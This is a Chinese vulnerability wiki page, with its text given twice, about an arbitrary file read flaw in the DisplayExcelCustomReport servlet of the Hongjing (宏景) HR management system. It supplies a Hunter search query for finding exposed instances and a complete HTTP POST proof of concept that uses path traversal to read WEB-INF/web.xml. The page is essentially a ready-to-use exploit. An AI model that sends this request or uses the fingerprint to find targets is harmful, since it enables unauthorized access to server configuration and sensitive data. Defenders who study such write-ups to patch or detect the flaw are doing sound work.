fofamini-wiki

登录白背景

源码

宏景人力资源信息管理系统DisplayExcelCustomReport存在任意文件读取漏洞

一、漏洞简介

宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统DisplayExcelCustomReport存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

二、影响版本

宏景人力资源信息管理系统

三、资产测绘

hunterapp.name="宏景 HCM"
特征

四、漏洞复现

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

filename=../webapps/ROOT/WEB-INF/web.xml

原文: https://www.yuque.com/xiaokp7/ocvun2/pcir8na3m99o8572

# 宏景人力资源信息管理系统DisplayExcelCustomReport存在任意文件读取漏洞

# 一、漏洞简介
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统DisplayExcelCustomReport存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

# 二、影响版本
+ 宏景人力资源信息管理系统

# 三、资产测绘
+ hunter`app.name="宏景 HCM"`
+ 特征

![1702368984886-bd83145b-caba-4fdc-9916-c5473e122d40.png](./img/OSl1aRjoCJESUzBS/1702368984886-bd83145b-caba-4fdc-9916-c5473e122d40-502981.png)

# 四、漏洞复现
```plain
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

filename=../webapps/ROOT/WEB-INF/web.xml
```

![1711822935264-64812a69-d6f9-49c3-92ff-5aa308270426.png](./img/OSl1aRjoCJESUzBS/1711822935264-64812a69-d6f9-49c3-92ff-5aa308270426-614577.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pcir8na3m99o8572>